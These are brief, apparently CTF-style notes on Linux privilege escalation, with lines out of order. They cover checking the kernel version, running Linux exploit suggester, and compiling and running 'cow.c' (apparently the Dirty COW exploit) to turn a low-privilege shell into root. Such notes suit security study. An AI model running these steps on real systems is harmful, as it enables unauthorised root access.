Last updated 2 years ago
uname -a or cat /etc/lsb-release
uname -a
cat /etc/lsb-release
We can then google the version we get and see if anything comes out
We can also use Linux exploit suggester and investigate the results
gcc -pthread cow.c -o cow -lcrypt
passwd should let us be root
passwd
We can use this
We are a low privilege user for now
./cow